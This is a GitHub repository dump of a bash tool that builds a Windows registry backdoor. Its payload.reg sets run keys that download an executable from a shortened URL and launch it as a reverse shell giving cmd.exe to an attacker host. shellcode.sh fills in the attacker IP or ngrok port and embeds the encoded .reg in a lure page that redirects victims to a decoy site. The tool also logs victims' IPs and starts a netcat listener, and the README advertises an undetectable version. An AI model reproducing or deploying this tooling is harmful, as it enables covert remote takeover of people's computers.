https://www.facebook.com/profile.php?id=100039477441223

├── Advance_Backdoor.zip ├── README.md ├── index.php ├── ip.php ├── ngrok ├── payload.reg ├── shellcode.sh └── template.html /Advance_Backdoor.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4xSec/shellcode/HEAD/Advance_Backdoor.zip -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

2 | Follow on Social Media Platforms 3 |

4 |

5 | 6 |

7 | 8 | # ScreenShot 9 | ![Screenshot from 2020-07-22 13-55-42](https://user-images.githubusercontent.com/57313495/88177925-98d9e980-cbf7-11ea-9883-59d3a525b494.png) 10 | 11 | # Advance Backdoor 12 | For Advance_reg FUD backdoor Contact ME (for key only, Zip is already attached) 13 | 14 | # INSTALLATION [ TERMUX APP --ANDROID ] 15 | * git clone https://github.com/predator0x300/shellcode 16 | * cd shellcode/ 17 | * bash shellcode.sh 18 | 19 | # INSTALLATION [ KALI ] 20 | * git clone https://github.com/predator0x300/shellcode 21 | * cd shellcode/ 22 | * ./shellcode.sh 23 | 24 | # TESTED ON FOLLOWING:- 25 | * Kali Linux - 2020.1a (version) 26 | * Parrot OS - Rolling Edition (version) 27 | * Ubuntu 28 | * Arch Linux 29 | * Termux App (Beta v, some automation will not gonna work) 30 | # PREREQUISITES 31 | * sudo - [ MUST ] 32 | 33 | # LANGUAGE 34 | * Bash 35 | 36 | 37 | # Contact For Contribute & Issues 38 | 39 | EMAIL FOR ISSUES AND CONTRIBUTE : predator0x300@gmail.com 40 | 41 | # DISCLAIMER 42 | TO BE USED FOR EDUCATIONAL PURPOSES ONLY 43 | 44 | The use of the shellcode is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. 45 | 46 | 47 | -------------------------------------------------------------------------------- /index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | https://www.facebook.com/profile.php?id=100039477441223 5 | 6 | 7 | 10 | 11 | 19 | 20 | 21 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /ip.php: -------------------------------------------------------------------------------- 1 | NUL & echo ^[Net.ServicePointManager^]::SecurityProtocol ^= ^[Net.SecurityProtocolType^]::Tls12 > c:\\reg\\b.ps1 & echo (wget 'https://tinyurl.com/y88r9epk' -OutFile c:\\reg\\a.exe) >> c:\\reg\\b.ps1" 6 | 7 | "regbd2"="C:\\Windows\\System32\\cmd.exe /c powershell -ExecutionPolicy ByPass -File c:\\reg\\b.ps1 & START /MIN c:\\reg\\a.exe server_ip server_port -e cmd.exe -d & exit" 8 | -------------------------------------------------------------------------------- /shellcode.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | trap 'printf "\n";stop' 2 4 | server_tcp="3.17.202.129" 5 | 6 | banner() { 7 | 8 | 9 | printf "\e[1;91m .---. .__ .__ .__ \e[93m .___ \e[0m \n" 10 | printf "\e[1;91m / \ -------> _____| |__ ____ | | | | \e[93m ____ ____ __| _/____ \e[0m \n" 11 | printf "\e[1;91m \.@-@./ ------> / ___/ | \_/ __ \| | | | \e[93m _/ ___\/ _ \ / __ |/ __ \ \e[0m \n" 12 | printf "\e[1;91m / \_/ \ -----> \___ \| Y \ ___/| |_| |__ \e[93m \ \__( <_> ) /_/ \ ___/ \e[0m \n" 13 | printf "\e[1;91m // _ \ \ /____ >___| /\___ >____/____/\e[93m____\___ >____/\____ |\___ >\e[0m \n" 14 | printf "\e[1;91m | \ )| \/ \/ \/ /__\e[93m___/ \/ \/ \/ \e[0m \n" 15 | printf "\e[1;91m /_ > <_/ \_ reg_backdoor \e[0m \n" 16 | printf "\e[1;91m \__/---\__/ _windows\e[0m \n" 17 | printf " \e[1;91m---------->> Coded By predator0x300 <<----------\e[0m \n" 18 | printf " \e[1;91m{Github: https://github.com/khacker1024}\e[93m\n" 19 | printf "\n" 20 | 21 | 22 | 23 | printf "\e[1;91m+----------------------------------------------+\e[0m \n" 24 | printf "\e[1;91m| Advance reg_backdoor$ |\e[0m \n" 25 | printf "\e[1;91m+----------------------------------------------+\e[0m \n" 26 | printf "\e[1;91m| For FUD REG_Backdoor along with Dropper Key |\e[0m \n" 27 | printf "\e[1;91m| Contact: predator0x300 ---------<<< |\e[0m \n" 28 | printf "\e[1;91m+----------------------------------------------+\e[0m \n" 29 | 30 | 31 | } 32 | 33 | stop() { 34 | 35 | checkngrok=$(ps aux | grep -o "ngrok" | head -n1) 36 | checkphp=$(ps aux | grep -o "php" | head -n1) 37 | checkssh=$(ps aux | grep -o "ssh" | head -n1) 38 | if [[ $checkngrok == *'ngrok'* ]]; then 39 | killall -2 ngrok > /dev/null 2>&1 40 | fi 41 | 42 | if [[ $checkphp == *'php'* ]]; then 43 | killall -2 php > /dev/null 2>&1 44 | fi 45 | if [[ $checkssh == *'ssh'* ]]; then 46 | killall -2 ssh > /dev/null 2>&1 47 | fi 48 | exit 1 49 | 50 | } 51 | 52 | dependencies() { 53 | 54 | command -v base64 > /dev/null 2>&1 || { echo >&2 "I require base64 but it's not installed. Install it. Aborting."; exit 1; } 55 | #command -v zip > /dev/null 2>&1 || { echo >&2 "I require MSFVenom but it's not installed. Install it. Aborting."; exit 1; } 56 | command -v netcat > /dev/null 2>&1 || { echo >&2 "I require netcat but it's not installed. Install it. Aborting."; exit 1; } 57 | command -v php > /dev/null 2>&1 || { echo >&2 "I require php but it's not installed. Install it. Aborting."; exit 1; } 58 | #command -v ssh > /dev/null 2>&1 || { echo >&2 "I require ssh but it's not installed. Install it. Aborting."; exit 1; } 59 | 60 | } 61 | 62 | direct_link() { 63 | if [[ ! -e sendlink ]]; then 64 | printf "Error!\n" 65 | exit 1 66 | else 67 | 68 | send_link=$(grep -o "https://[^ ]*." sendlink) 69 | if [[ ! -z "$send_link" ]]; then 70 | 71 | printf '\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] Direct link:\e[0m\e[1;77m %s\n' $send_link 72 | printf '\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] Obfuscation URL use bitly.com (insert above link without https)\e[0m\n' 73 | 74 | else 75 | printf "Error!" 76 | exit 1 77 | fi 78 | 79 | fi 80 | 81 | } 82 | 83 | ngrok_server() { 84 | 85 | if [[ -e ngrok ]]; then 86 | echo "" 87 | else 88 | command -v unzip > /dev/null 2>&1 || { echo >&2 "I require unzip but it's not installed. Install it. Aborting."; exit 1; } 89 | command -v wget > /dev/null 2>&1 || { echo >&2 "I require wget but it's not installed. Install it. Aborting."; exit 1; } 90 | printf "\e[1;92m[\e[0m+\e[1;92m] Downloading Ngrok...\n" 91 | arch=$(uname -a | grep -o 'arm' | head -n1) 92 | arch2=$(uname -a | grep -o 'Android' | head -n1) 93 | if [[ $arch == *'arm'* ]] || [[ $arch2 == *'Android'* ]] ; then 94 | wget --no-check-certificate https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip > /dev/null 2>&1 95 | 96 | if [[ -e ngrok-stable-linux-arm.zip ]]; then 97 | unzip ngrok-stable-linux-arm.zip > /dev/null 2>&1 98 | chmod +x ngrok 99 | rm -rf ngrok-stable-linux-arm.zip 100 | else 101 | printf "\e[1;93m[!] Download error... Termux, run:\e[0m\e[1;77m pkg install wget\e[0m\n" 102 | exit 1 103 | fi 104 | 105 | else 106 | wget --no-check-certificate https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.zip > /dev/null 2>&1 107 | if [[ -e ngrok-stable-linux-386.zip ]]; then 108 | unzip ngrok-stable-linux-386.zip > /dev/null 2>&1 109 | chmod +x ngrok 110 | rm -rf ngrok-stable-linux-386.zip 111 | else 112 | printf "\e[1;93m[!] Download error... \e[0m\n" 113 | exit 1 114 | fi 115 | fi 116 | fi 117 | printf "\e[1;91m------------------------------------\e[0m\n" 118 | printf "\e[1;92m{\e[0m+\e[1;92m} Starting php server.......\n" 119 | php -S 127.0.0.1:3333 > /dev/null 2>&1 & 120 | sleep 2 121 | 122 | if [[ -e check_ngrok ]]; then 123 | rm -rf ngrok_check 124 | fi 125 | 126 | printf "\e[1;92m{\e[0m+\e[1;92m} Starting the server.....\e[0m\n" 127 | ./ngrok tcp 4444 > /dev/null 2>&1 > check_ngrok & 128 | sleep 10 129 | 130 | check_ngrok=$(grep -o 'ERR_NGROK_302' check_ngrok) 131 | 132 | if [[ ! -z $check_ngrok ]];then 133 | printf "\n\e[91mAuthtoken missing!\e[0m\n" 134 | printf "\e[77mSign up at: https://ngrok.com/signup\e[0m\n" 135 | printf "\e[77mYour authtoken is available on your dashboard: https://dashboard.ngrok.com\n\e[0m" 136 | printf "\e[77mInstall your auhtoken:\e[0m\e[93m ./ngrok authtoken \e[0m\n\n" 137 | rm -rf check_ngrok 138 | exit 1 139 | fi 140 | 141 | link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "tcp://0.tcp.ngrok.io:[0-9]*") 142 | 143 | if [[ ! -z $link ]]; then 144 | printf "\e[1;92m[\e[0m*\e[1;92m] Forwarding from:\e[0m\e[1;77m %s\e[0m\n" $link 145 | else 146 | printf "\n\e[91m{-} Ngrok Error! :((\e[0m\n" 147 | exit 1 148 | fi 149 | 150 | } 151 | 152 | settings() { 153 | 154 | default_choose_sub="Y" 155 | default_subdomain="microsoft" 156 | 157 | printf '\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m] Choose subdomain? (Default:\e[0m\e[1;77m [Y/n] \e[0m\e[1;33m): \e[0m' 158 | read choose_sub 159 | choose_sub="${choose_sub:-${default_choose_sub}}" 160 | if [[ $choose_sub == "Y" || $choose_sub == "y" || $choose_sub == "Yes" || $choose_sub == "yes" ]]; then 161 | subdomain_resp=true 162 | printf '\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m] Subdomain: (Default:\e[0m\e[1;77m %s \e[0m\e[1;33m): \e[0m' $default_subdomain 163 | read subdomain 164 | subdomain="${subdomain:-${default_subdomain}}" 165 | fi 166 | 167 | } 168 | 169 | settings2() { 170 | 171 | default_payload_name="shellc" 172 | default_url="https://www.facebook.com/profile.php?id=100039477441223" 173 | #printf "\e[1;91m----------------------\e[0m\n" 174 | #printf "\e[1;91m| Configuration: |\e[0m\n" 175 | #printf "\e[1;91m| {+} RHOST IP: \e[0m\e[1;77m%s\e[0m\e[1;91m |\e[0m\n" $custom_ip 176 | #printf "\e[1;91m| {+} RHOST PORT: \e[0m\e[1;77m%s\e[0m\e[1;91m |\e[0m\n" $custom_port 177 | #printf "\e[1;91m----------------------\e[0m\n" 178 | #read -p $'\n\e[1;92m{\e[0m\e[1;77m+\e[0m\e[1;92m} SET THE ABOVE CONFIGURATION ? (1/0) \e[0m\n=>>> ' ask_configuration 179 | 180 | #if [[ $ask_configuration -eq 1 ]]; then 181 | printf '\e[1;33m{\e[0m\e[1;77m+\e[0m\e[1;33m} Win_Backdoor_Name (shellc):\e[0m\n=>>> ' 182 | 183 | read payload_name 184 | payload_name="${payload_name:-${default_payload_name}}" 185 | printf "\e[1;91m----------------------------------\e[0m\n" 186 | printf "\e[1;91m| Configuration: |\e[0m\n" 187 | printf "\e[1;91m| {+} RHOST IP: \e[0m\e[1;77m%s\e[0m\e[1;91m |\e[0m\n" $custom_ip 188 | printf "\e[1;91m| {+} RHOST PORT: \e[0m\e[1;77m%s\e[0m\e[1;91m |\e[0m\n" $custom_port 189 | printf "\e[1;91m| {+} Backdoor: \e[0m\e[1;77m%s\e[0m\e[1;91m |\e[0m\n" $payload_name 190 | printf "\e[1;91m| {-} P_FORWARDING: Disabled \e[0m\e[1;77m%s\e[0m\e[1;91m |\e[0m\n" 191 | printf "\e[1;91m----------------------------------\e[0m\n" 192 | 193 | printf '\e[1;33m{\e[0m\e[1;77m+\e[0m\e[1;33m} Redirect URL To: \e[0m\n=>>> ' 194 | read url 195 | url="${url:-${default_url}}" 196 | 197 | #if [[ $ask_configuration -eq 1 ]]; then 198 | #continue 199 | #else 200 | #printf "\e[1;91m----------------------\e[0m\n" 201 | } 202 | 203 | 204 | 205 | 206 | 207 | start() { 208 | 209 | if [[ -e ip.txt ]]; then 210 | rm -f ip.txt 211 | fi 212 | 213 | printf "\n" 214 | 215 | printf "\e[1;92m{\e[0m\e[1;77m-\e[0m\e[1;92m}\e[0m\e[1;93m Target System must be rebooted! ;))\e[0m\n" 216 | #printf "\e[1;92m{\e[0m\e[1;77m+\e[0m\e[1;92m}\e[0m\e[1;93m Do You Wanna Do Port Forwarding? (y/n)\e[0m\n" 217 | printf "\e[1;91m------------------------------------\e[0m" 218 | default_option_server="0" 219 | read -p $'\n\e[1;92m{\e[0m\e[1;77m+\e[0m\e[1;92m} Do You Wanna Execute on LServer? (1/0) \e[0m\n=>>> ' option_server 220 | option_server="${option_server:-${default_option_server}}" 221 | if [[ $option_server -eq 0 ]]; then 222 | 223 | command -v php > /dev/null 2>&1 || { echo >&2 "I require ssh but it's not installed. Install it. Aborting."; exit 1; } 224 | forward=true 225 | #settings 226 | settings2 227 | ngrok_server 228 | #server 229 | payload 230 | #direct_link 231 | listener 232 | elif [[ $option_server -eq 1 ]]; then 233 | printf "\e[1;91m-----\e[0m\n" 234 | read -p $'\e[1;92m{\e[0m\e[1;77m+\e[0m\e[1;92m} HOST IP: \e[0m\n=>>> ' custom_ip 235 | if [[ -z "$custom_ip" ]]; then 236 | exit 1 237 | fi 238 | server_tcp=$custom_ip 239 | read -p $'\e[1;92m{\e[0m\e[1;77m+\e[0m\e[1;92m} TCP port (default:4444): \e[0m\n=>>> ' custom_port 240 | #printf "\e[1;91m-----\e[0m\n" 241 | if [[ -z "$custom_port" ]]; then 242 | exit 1 243 | fi 244 | server_port=$custom_port 245 | settings2 246 | payload 247 | listener 248 | else 249 | printf "\e[1;93m [!] Invalid option!\e[0m\n" 250 | sleep 1 251 | clear 252 | start 253 | fi 254 | 255 | } 256 | 257 | server() { 258 | 259 | printf "\e[1;77m[\e[0m\e[1;93m+\e[0m\e[1;77m] Starting localhost.run server...\e[0m\n" 260 | 261 | if [[ $subdomain_resp == true ]]; then 262 | 263 | ssh -T -tt -o StrictHostKeyChecking=no -R 80:localhost:3333 "$subdomain"@ssh.localhost.run > sendlink & 264 | sleep 4 265 | else 266 | $(which sh) -c 'ssh -t -t -o StrictHostKeyChecking=no -R 80:localhost:3333 ssh.localhost.run 2> /dev/null > sendlink ' & 267 | sleep 4 268 | fi 269 | 270 | } 271 | 272 | catch_ip() { 273 | 274 | ip=$(grep -a 'IP:' ip.txt | cut -d " " -f2 | tr -d '\r') 275 | IFS=$'\n' 276 | device=$(grep -o 'User-Agent:.*' ip.txt | cut -d ":" -f2) 277 | printf "\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] IP:\e[0m\e[1;77m %s\e[0m\n" $ip 278 | printf "\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] User-Agent:\e[0m\e[1;77m %s\e[0m\n" $device 279 | cat ip.txt >> saved.ip.txt 280 | rm -rf ip.txt 281 | } 282 | 283 | listener() { 284 | 285 | if [[ $forward == true ]];then 286 | printf "\e[1;77m[\e[0m\e[1;33m+\e[0m\e[1;77m]\e[1;91m Expose the server with command: \e[0m\n" 287 | printf "\e[1;77m[\e[0m\e[1;33m+\e[0m\e[1;77m]\e[0m\e[93m ssh -R 80:localhost:3333 custom-subdomain@ssh.localhost.run \e[0m\n" 288 | #printf "\e[1;77m[\e[0m\e[1;33m+\e[0m\e[1;77m]\e[0m\e[92m Send the HTTP link instead HTTPS to automatically download reg file \e[0m\n" 289 | 290 | checkfound 291 | else 292 | default_start_listener="1" 293 | printf '\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m] DO YOU WANNA START LISTENING ON PORT { %s } [1/0]? \e[0m\n=> ' $custom_port 294 | read start_listener 295 | start_listener="${start_listener:-${default_start_listener}}" 296 | if [[ $start_listener == "1" || $start_listener == "y" || $start_listener == "Yes" || $start_listener == "yes" ]]; then 297 | printf "\e[1;77m[\e[0m\e[1;33m+\e[0m\e[1;77m] Listening connection:\e[0m\n" 298 | nc -lvp $custom_port 299 | else 300 | exit 1 301 | fi 302 | fi 303 | } 304 | 305 | checkfound() { 306 | 307 | printf "\n" 308 | printf "\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m] Waiting targets,\e[0m\e[1;77m Press Ctrl + C to exit...\e[0m\n" 309 | while [ true ]; do 310 | 311 | if [[ -e "ip.txt" ]]; then 312 | printf "\n\e[1;92m[\e[0m+\e[1;92m] Target opened the link!\n" 313 | catch_ip 314 | 315 | default_start_listener="Y" 316 | printf '\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m] Start Listener? \e[0m\e[1;77m[Y/n]\e[0m\e[1;33m: \e[0m' 317 | read start_listener 318 | start_listener="${start_listener:-${default_start_listener}}" 319 | if [[ $start_listener == "Y" || $start_listener == "y" || $start_listener == "Yes" || $start_listener == "yes" ]]; then 320 | printf "\e[1;77m[\e[0m\e[1;33m+\e[0m\e[1;77m] Listening connection:\e[0m\n" 321 | nc -lvp 4444 322 | 323 | fi 324 | fi 325 | done 326 | sleep 0.5 327 | 328 | } 329 | 330 | payload() { 331 | if [[ $forward == true ]];then 332 | server_port=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "tcp://0.tcp.ngrok.io:[0-9]*" | cut -d ':' -f3) 333 | fi 334 | printf "\e[1;91m------------------------------------------------------------|Starting_Pls_Wait|-----------------------------------------------------------------------\e[0m\n" 335 | sleep 0.5 336 | printf "\e[1;91m{\e[0m\e[1;33m+\e[0m\e[1;91m}\e[0m\e[1;77m Starting the Backdoor..............//\e[0m\n" 337 | sleep 0.2 338 | printf "\e[1;77m{\e[0m\e[1;33m+\e[0m\e[1;77m} Creating reg_backdoor............//\e[0m\n" 339 | sleep 0.2 340 | sed 's+server_ip+'$server_tcp'+g' payload.reg | sed 's+server_port+'$server_port'+g' > $payload_name.reg 341 | 342 | if [[ -e $payload_name.reg ]]; then 343 | 344 | #zip $payload_name.zip $payload_name.reg > /dev/null 2>&1 345 | IFS=$'\n' 346 | #data_base64=$(base64 -w 0 $payload_name.zip) 347 | #temp64="$( echo "${data_base64}" | sed 's/[\\&*./+!]/\\&/g' )" 348 | data_base64_2=$(base64 -w 0 $payload_name.reg) 349 | temp64_2="$( echo "${data_base64_2}" | sed 's/[\\&*./+!]/\\&/g' )" 350 | sleep 0.1 351 | printf "\e[1;77m{\e[0m\e[1;33m+\e[0m\e[1;77m} Encrypting the reg with base64.........//\e[0m\n" 352 | sleep 0.2 353 | printf "\e[1;77m{\e[0m\e[1;33m+\e[0m\e[1;77m} Finishing the process!!\e[0m\n" 354 | sleep 0.3 355 | sed 's+url_website+'$url'+g' template.html | sed 's+payload_name+'$payload_name'+g' | sed 's+data_base64+'${temp64_2}'+g ' > index.php 356 | printf "\e[1;91m{\e[0m\e[1;33m+\e[0m\e[1;91m} Generated_Backdoor: {--> %s.reg <--}\e[0m\n" $payload_name 357 | printf "\e[1;91m------------------------------------------------------------|Listener_Started|-----------------------------------------------------------------------\e[0m\n" 358 | sleep 0.1 359 | 360 | else 361 | printf "\e[1;93m{-} Error! :((\e[0m\n" 362 | fi 363 | 364 | } 365 | banner 366 | dependencies 367 | start 368 | 369 | -------------------------------------------------------------------------------- /template.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | url_website 5 | 6 | 7 | 10 | 11 | 19 | 20 | 21 | 23 | 24 | 25 | 26 | --------------------------------------------------------------------------------